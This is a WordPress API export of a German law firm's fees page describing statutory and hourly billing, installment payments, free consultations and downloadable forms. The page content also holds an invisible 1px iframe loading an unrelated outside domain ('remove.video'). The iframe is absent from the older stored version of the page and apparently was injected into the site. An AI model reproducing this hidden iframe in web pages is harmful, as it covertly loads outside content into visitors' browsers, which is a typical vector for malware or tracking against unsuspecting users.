{"id":13929,"date":"2015-05-28T14:22:09","date_gmt":"2015-05-28T12:22:09","guid":{"rendered":"https:\/\/ra-juedemann.de\/service-und-gebuehren\/"},"modified":"2021-08-27T11:47:52","modified_gmt":"2021-08-27T09:47:52","slug":"service-und-gebuehren","status":"publish","type":"page","link":"https:\/\/ra-juedemann.de\/en\/service-und-gebuehren\/","title":{"rendered":"SERVICE UND GEB\u00dcHREN"},"content":{"rendered":"<p>[et_pb_section fb_built=&#8221;1&#8243; fullwidth=&#8221;on&#8221; _builder_version=&#8221;4.6.6&#8243; _module_preset=&#8221;default&#8221;][et_pb_fullwidth_header title=&#8221;Service und Geb\u00fchren&#8221; _builder_version=&#8221;4.7.7&#8243; _module_preset=&#8221;default&#8221; title_font_size=&#8221;40px&#8221; title_letter_spacing=&#8221;2px&#8221; background_image=&#8221;https:\/\/ra-juedemann.de\/wp-content\/uploads\/2019\/04\/ANWALT_URHEBERRECHT_BERLIN-1.jpg&#8221;][\/et_pb_fullwidth_header][\/et_pb_section][et_pb_section fb_built=&#8221;1&#8243; _builder_version=&#8221;3.22&#8243;][et_pb_row _builder_version=&#8221;4.9.7&#8243; background_size=&#8221;initial&#8221; background_position=&#8221;top_left&#8221; background_repeat=&#8221;repeat&#8221; hover_enabled=&#8221;0&#8243; sticky_enabled=&#8221;0&#8243;][et_pb_column type=&#8221;4_4&#8243; _builder_version=&#8221;3.25&#8243; custom_padding=&#8221;|||&#8221; custom_padding__hover=&#8221;|||&#8221;][et_pb_text _builder_version=&#8221;4.9.7&#8243; background_size=&#8221;initial&#8221; background_position=&#8221;top_left&#8221; background_repeat=&#8221;repeat&#8221; hover_enabled=&#8221;0&#8243; sticky_enabled=&#8221;0&#8243;]<\/p>\n<p class=\"Stil2\"><strong>Kosten<\/strong><\/p>\n<p class=\"Stil2\">Im Rahmen unserer bundesweiten gerichtlichen T\u00e4tigkeit richtet sich unsere Verg\u00fctung &#8211; sofern nichts anderes vereinbart wurde &#8211; grunds\u00e4tzlich nach dem<strong> Rechtsanwaltsverg\u00fctungsgesetz (RVG)<\/strong>. Danach ist die H\u00f6he der Rechtsanwaltsgeb\u00fchr abh\u00e4ngig vom so genannten Streitwert sowie vom Umfang und dem Schwierigkeitsgrad des Mandats.<\/p>\n<p class=\"Stil2\">Je nach Art des Mandats bieten wir Ihnen auch individuelle<strong> Verg\u00fctungsvereinbarungen<\/strong> nach Stundenaufwand oder als Pauschale an. Dies empfiehlt sich vor allem bei der au\u00dfergerichtlichen Vertretung, bei einer l\u00e4ngerfristigen Beratung oder f\u00fcr die Inkassot\u00e4tigkeit. Die Einzelheiten der Verg\u00fctung werden in einem schriftlichen Verg\u00fctungsvertrag geregelt. Unsere Stundens\u00e4tze betragen ab 220,00 EUR inklusive Mehrwertsteuer. In Einzelf\u00e4llen, so etwa gemeinn\u00fctzigen Organisationen, bieten wir g\u00fcnstigere S\u00e4tze an. Wir bieten zudem Beratungen zum Festpreis an.<\/p>\n<p>Unsere Geb\u00fchren k\u00f6nnen gerne in Raten gezahlt werden, die sich nach den finanziellen M\u00f6glichkeiten unserer Mandanten richten.<\/p>\n<p><strong><span style=\"color: #80bc02;\">Bitte beachten Sie, dass wir jeden Freitag ab 14:00 Uhr kostenlosen Beratungen zu unseren Rechtsgebieten (mit Ausnahme File-Sharing F\u00e4llen) in unseren Kanzleir\u00e4umen anbieten. Die Beratung erfolgt nur mit Terminvergabe.<br \/>\n<\/span><\/strong><\/p>\n<p>&nbsp;<\/p>\n<p class=\"Stil2\"><strong>Im Falle urheberrechtlicher Massenabmahnungen im Bereich des File-Sharing bieten wir Geb\u00fchrenpauschalen sowie eine kostenlose telefonische Ersteinsch\u00e4tzung.<br \/>\n<\/strong><\/p>\n<p class=\"Stil2\">\u00dcber die Kosten unserer T\u00e4tigkeit und \u00fcber das von Ihnen zu tragende Kostenrisiko kl\u00e4ren wir Sie selbstverst\u00e4ndlich vor Beginn unserer T\u00e4tigkeit auf.<\/p>\n<p><strong>Download von Formularen <\/strong><\/p>\n<p><strong>Verg\u00fctungsvereinbarung <\/strong>(Verg\u00fctung nach Stundens\u00e4tzen in au\u00dfergerichtlichen Verfahren)<\/p>\n<p><strong>Verg\u00fctungsvereinbarung <\/strong>(pauschale Verg\u00fctung in au\u00dfergerichtlichen Verfahren)<\/p>\n<p><a title=\"Vollmacht f\u00fcr anwaltliche Vertretung\" href=\"https:\/\/ra-juedemann.de\/Formular_Vollmacht.pdf\"><strong>Vollmacht <\/strong><\/a>f\u00fcr anwaltliche Vertretung<\/p>\n<p>&nbsp;<\/p>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kosten Im Rahmen unserer bundesweiten gerichtlichen T\u00e4tigkeit richtet sich unsere Verg\u00fctung &#8211; sofern nichts anderes vereinbart wurde &#8211; grunds\u00e4tzlich nach dem Rechtsanwaltsverg\u00fctungsgesetz (RVG). Danach ist die H\u00f6he der Rechtsanwaltsgeb\u00fchr abh\u00e4ngig vom so genannten Streitwert sowie vom Umfang und dem Schwierigkeitsgrad des Mandats. Je nach Art des Mandats bieten wir Ihnen auch individuelle Verg\u00fctungsvereinbarungen nach Stundenaufwand [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":2,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"<p class=\"Stil2\"><strong>Kosten<\/strong><\/p><p class=\"Stil2\">Im Rahmen unserer bundesweiten gerichtlichen T\u00e4tigkeit richtet sich unsere Verg\u00fctung - sofern nichts anderes vereinbart wurde - grunds\u00e4tzlich nach dem<strong> Rechtsanwaltsverg\u00fctungsgesetz (RVG)<\/strong>. Danach ist die H\u00f6he der Rechtsanwaltsgeb\u00fchr abh\u00e4ngig vom so genannten Streitwert sowie vom Umfang und dem Schwierigkeitsgrad des Mandats.<\/p><p class=\"Stil2\">Je nach Art des Mandats bieten wir Ihnen auch individuelle<strong> Verg\u00fctungsvereinbarungen<\/strong> nach Stundenaufwand oder als Pauschale an. Dies empfiehlt sich vor allem bei der au\u00dfergerichtlichen Vertretung, bei einer l\u00e4ngerfristigen Beratung oder f\u00fcr die Inkassot\u00e4tigkeit. Die Einzelheiten der Verg\u00fctung werden in einem schriftlichen Verg\u00fctungsvertrag geregelt.Unsere Stundens\u00e4tze betragen ab 220,00 EUR inklusive Mehrwertsteuer. In Einzelf\u00e4llen, so etwa gemeinn\u00fctzigen Organisationen, bieten wir g\u00fcnstigere S\u00e4tze an. Wir bieten zudem Beratungen zum Festpreis an.<\/p><p>Unsere Geb\u00fchren k\u00f6nnen gerne in Raten gezahlt werden, die sich nach den finanziellen M\u00f6glichkeiten unserer Mandanten richten.<\/p><p><span style=\"color: #ff0000;\">Bitte beachten Sie, dass wir in Zeiten von Corona kostenlose telefonische Beratung zu unseren Rechtsgebieten anbieten!<\/span><\/p><p>\u00a0<\/p><p class=\"Stil2\"><strong>Im Falle urheberrechtlicher Massenabmahnungen im Bereich des File-Sharing bieten wir Geb\u00fchrenpauschalen an.<br \/><\/strong><\/p><p class=\"Stil2\">\u00dcber die Kosten unserer T\u00e4tigkeit und \u00fcber das von Ihnen zu tragende Kostenrisiko kl\u00e4ren wir Sie selbstverst\u00e4ndlich vor Beginn unserer T\u00e4tigkeit auf.<\/p><p><strong>Download von Formularen <\/strong><\/p><ul><li class=\"linksexact\"><span class=\"Stil2\"><strong>Verg\u00fctungsvereinbarung<\/strong><\/span> <span class=\"flie\u00dftext\">(Verg\u00fctung nach Stundens\u00e4tzen in au\u00dfergerichtlichen Verfahren)<\/span><\/li><li><span class=\"Stil2\"><strong>Verg\u00fctungsvereinbarung<\/strong><\/span> <span class=\"flie\u00dftext\">(pauschale Verg\u00fctung in au\u00dfergerichtlichen Verfahren)<\/span><\/li><li><a title=\"Formular_Vollmacht\" href=\"https:\/\/ra-juedemann.de\/Formular_Vollmacht.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><span class=\"Stil2\"><strong>Vollmacht<\/strong><\/span><\/a> <span class=\"flie\u00dftext\">f\u00fcr anwaltliche Vertretung<\/span><\/li><\/ul>","_et_gb_content_width":"","footnotes":""},"class_list":["post-13929","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>SERVICE UND GEB\u00dcHREN<\/title>\n<meta name=\"description\" content=\"SERVICE UND GEB\u00dcHREN - Kosten Im Rahmen unserer bundesweiten gerichtlichen T\u00e4tigkeit richtet sich unsere Verg\u00fctung - sofern nichts anderes vereinbart wurde - grunds\u00e4tzlich nach dem Rechtsanwaltsverg\u00fctungsgesetz (RVG). Danach ist die H\u00f6he der Rechtsanwaltsgeb\u00fchr abh\u00e4ngig vom so genannten Streitwert sowie vom Umfang und dem Schwierigkeitsgrad des Mandats.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/ra-juedemann.de\/en\/service-und-gebuehren\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SERVICE UND GEB\u00dcHREN\" \/>\n<meta property=\"og:description\" content=\"SERVICE UND GEB\u00dcHREN - Kosten Im Rahmen unserer bundesweiten gerichtlichen T\u00e4tigkeit richtet sich unsere Verg\u00fctung - sofern nichts anderes vereinbart wurde - grunds\u00e4tzlich nach dem Rechtsanwaltsverg\u00fctungsgesetz (RVG). Danach ist die H\u00f6he der Rechtsanwaltsgeb\u00fchr abh\u00e4ngig vom so genannten Streitwert sowie vom Umfang und dem Schwierigkeitsgrad des Mandats.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/ra-juedemann.de\/en\/service-und-gebuehren\/\" \/>\n<meta property=\"og:site_name\" content=\"J\u00fcdemann Rechtsanw\u00e4lte\" \/>\n<meta property=\"article:modified_time\" content=\"2021-08-27T09:47:52+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/ra-juedemann.de\\\/en\\\/service-und-gebuehren\\\/\",\"url\":\"https:\\\/\\\/ra-juedemann.de\\\/en\\\/service-und-gebuehren\\\/\",\"name\":\"SERVICE UND GEB\u00dcHREN\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/ra-juedemann.de\\\/#website\"},\"datePublished\":\"2015-05-28T12:22:09+00:00\",\"dateModified\":\"2021-08-27T09:47:52+00:00\",\"description\":\"SERVICE UND GEB\u00dcHREN - Kosten Im Rahmen unserer bundesweiten gerichtlichen T\u00e4tigkeit richtet sich unsere Verg\u00fctung - sofern nichts anderes vereinbart wurde - grunds\u00e4tzlich nach dem Rechtsanwaltsverg\u00fctungsgesetz (RVG). Danach ist die H\u00f6he der Rechtsanwaltsgeb\u00fchr abh\u00e4ngig vom so genannten Streitwert sowie vom Umfang und dem Schwierigkeitsgrad des Mandats.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/ra-juedemann.de\\\/en\\\/service-und-gebuehren\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/ra-juedemann.de\\\/en\\\/service-und-gebuehren\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/ra-juedemann.de\\\/en\\\/service-und-gebuehren\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/ra-juedemann.de\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"SERVICE UND GEB\u00dcHREN\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/ra-juedemann.de\\\/#website\",\"url\":\"https:\\\/\\\/ra-juedemann.de\\\/\",\"name\":\"J\u00fcdemann Rechtsanw\u00e4lte\",\"description\":\"Anwalt f\u00fcr Medien- und Urheberrecht in Berlin\",\"publisher\":{\"@id\":\"https:\\\/\\\/ra-juedemann.de\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/ra-juedemann.de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/ra-juedemann.de\\\/#organization\",\"name\":\"J\u00dcDEMANN RECHTSANW\u00c4LTE\",\"url\":\"https:\\\/\\\/ra-juedemann.de\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/ra-juedemann.de\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/ra-juedemann.de\\\/wp-content\\\/uploads\\\/2019\\\/05\\\/IMG_7727.jpg\",\"contentUrl\":\"https:\\\/\\\/ra-juedemann.de\\\/wp-content\\\/uploads\\\/2019\\\/05\\\/IMG_7727.jpg\",\"width\":992,\"height\":768,\"caption\":\"J\u00dcDEMANN RECHTSANW\u00c4LTE\"},\"image\":{\"@id\":\"https:\\\/\\\/ra-juedemann.de\\\/#\\\/schema\\\/logo\\\/image\\\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"SERVICE UND GEB\u00dcHREN","description":"SERVICE UND GEB\u00dcHREN - Kosten Im Rahmen unserer bundesweiten gerichtlichen T\u00e4tigkeit richtet sich unsere Verg\u00fctung - sofern nichts anderes vereinbart wurde - grunds\u00e4tzlich nach dem Rechtsanwaltsverg\u00fctungsgesetz (RVG). Danach ist die H\u00f6he der Rechtsanwaltsgeb\u00fchr abh\u00e4ngig vom so genannten Streitwert sowie vom Umfang und dem Schwierigkeitsgrad des Mandats.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/ra-juedemann.de\/en\/service-und-gebuehren\/","og_locale":"en_US","og_type":"article","og_title":"SERVICE UND GEB\u00dcHREN","og_description":"SERVICE UND GEB\u00dcHREN - Kosten Im Rahmen unserer bundesweiten gerichtlichen T\u00e4tigkeit richtet sich unsere Verg\u00fctung - sofern nichts anderes vereinbart wurde - grunds\u00e4tzlich nach dem Rechtsanwaltsverg\u00fctungsgesetz (RVG). Danach ist die H\u00f6he der Rechtsanwaltsgeb\u00fchr abh\u00e4ngig vom so genannten Streitwert sowie vom Umfang und dem Schwierigkeitsgrad des Mandats.","og_url":"https:\/\/ra-juedemann.de\/en\/service-und-gebuehren\/","og_site_name":"J\u00fcdemann Rechtsanw\u00e4lte","article_modified_time":"2021-08-27T09:47:52+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/ra-juedemann.de\/en\/service-und-gebuehren\/","url":"https:\/\/ra-juedemann.de\/en\/service-und-gebuehren\/","name":"SERVICE UND GEB\u00dcHREN","isPartOf":{"@id":"https:\/\/ra-juedemann.de\/#website"},"datePublished":"2015-05-28T12:22:09+00:00","dateModified":"2021-08-27T09:47:52+00:00","description":"SERVICE UND GEB\u00dcHREN - Kosten Im Rahmen unserer bundesweiten gerichtlichen T\u00e4tigkeit richtet sich unsere Verg\u00fctung - sofern nichts anderes vereinbart wurde - grunds\u00e4tzlich nach dem Rechtsanwaltsverg\u00fctungsgesetz (RVG). Danach ist die H\u00f6he der Rechtsanwaltsgeb\u00fchr abh\u00e4ngig vom so genannten Streitwert sowie vom Umfang und dem Schwierigkeitsgrad des Mandats.","breadcrumb":{"@id":"https:\/\/ra-juedemann.de\/en\/service-und-gebuehren\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/ra-juedemann.de\/en\/service-und-gebuehren\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/ra-juedemann.de\/en\/service-und-gebuehren\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/ra-juedemann.de\/en\/"},{"@type":"ListItem","position":2,"name":"SERVICE UND GEB\u00dcHREN"}]},{"@type":"WebSite","@id":"https:\/\/ra-juedemann.de\/#website","url":"https:\/\/ra-juedemann.de\/","name":"J\u00fcdemann Rechtsanw\u00e4lte","description":"Anwalt f\u00fcr Medien- und Urheberrecht in Berlin","publisher":{"@id":"https:\/\/ra-juedemann.de\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/ra-juedemann.de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/ra-juedemann.de\/#organization","name":"J\u00dcDEMANN RECHTSANW\u00c4LTE","url":"https:\/\/ra-juedemann.de\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/ra-juedemann.de\/#\/schema\/logo\/image\/","url":"https:\/\/ra-juedemann.de\/wp-content\/uploads\/2019\/05\/IMG_7727.jpg","contentUrl":"https:\/\/ra-juedemann.de\/wp-content\/uploads\/2019\/05\/IMG_7727.jpg","width":992,"height":768,"caption":"J\u00dcDEMANN RECHTSANW\u00c4LTE"},"image":{"@id":"https:\/\/ra-juedemann.de\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/ra-juedemann.de\/en\/wp-json\/wp\/v2\/pages\/13929","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ra-juedemann.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ra-juedemann.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ra-juedemann.de\/en\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/ra-juedemann.de\/en\/wp-json\/wp\/v2\/comments?post=13929"}],"version-history":[{"count":0,"href":"https:\/\/ra-juedemann.de\/en\/wp-json\/wp\/v2\/pages\/13929\/revisions"}],"wp:attachment":[{"href":"https:\/\/ra-juedemann.de\/en\/wp-json\/wp\/v2\/media?parent=13929"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}